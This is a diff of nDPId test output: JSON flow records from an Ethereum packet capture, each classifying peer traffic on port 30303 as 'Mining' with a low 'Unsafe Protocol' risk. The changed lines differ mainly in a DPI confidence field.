-00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365223,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1275,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1578508365094,"flow_last_seen":1578508365839,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1578508364924,"flow_last_seen":1578508365071,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":2045,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1578508364932,"flow_last_seen":1578508365309,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":1315,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508364659,"flow_last_seen":1578508365043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":1158,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364382,"flow_last_seen":1578508364650,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365751,"flow_last_seen":1578508365853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1396,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508366005,"flow_last_seen":1578508366135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":1439,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364422,"flow_last_seen":1578508365065,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":448,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578508365592,"flow_last_seen":1578508365773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1832,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1578508366020,"flow_last_seen":1578508366101,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508364522,"flow_last_seen":1578508365036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1241,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365009,"flow_last_seen":1578508365126,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1312,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1578508364824,"flow_last_seen":1578508365152,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":1388,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1578508365271,"flow_last_seen":1578508365838,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":1762,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1578508365279,"flow_last_seen":1578508366038,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1578508364714,"flow_last_seen":1578508364919,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1578508365300,"flow_last_seen":1578508366073,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":1177,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365154,"flow_last_seen":1578508365257,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364654,"flow_last_seen":1578508364729,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1055,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1578508365079,"flow_last_seen":1578508365297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":1734,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508365169,"flow_last_seen":1578508365272,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508365461,"flow_last_seen":1578508365899,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":138,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365331,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1578508364523,"flow_last_seen":1578508365354,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1578508364522,"flow_last_seen":1578508364841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364382,"flow_last_seen":1578508364519,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1055,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508365097,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364421,"flow_last_seen":1578508364694,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1136,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365701,"flow_last_seen":1578508365828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365223,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1275,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1578508365094,"flow_last_seen":1578508365839,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1578508364924,"flow_last_seen":1578508365071,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":2045,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 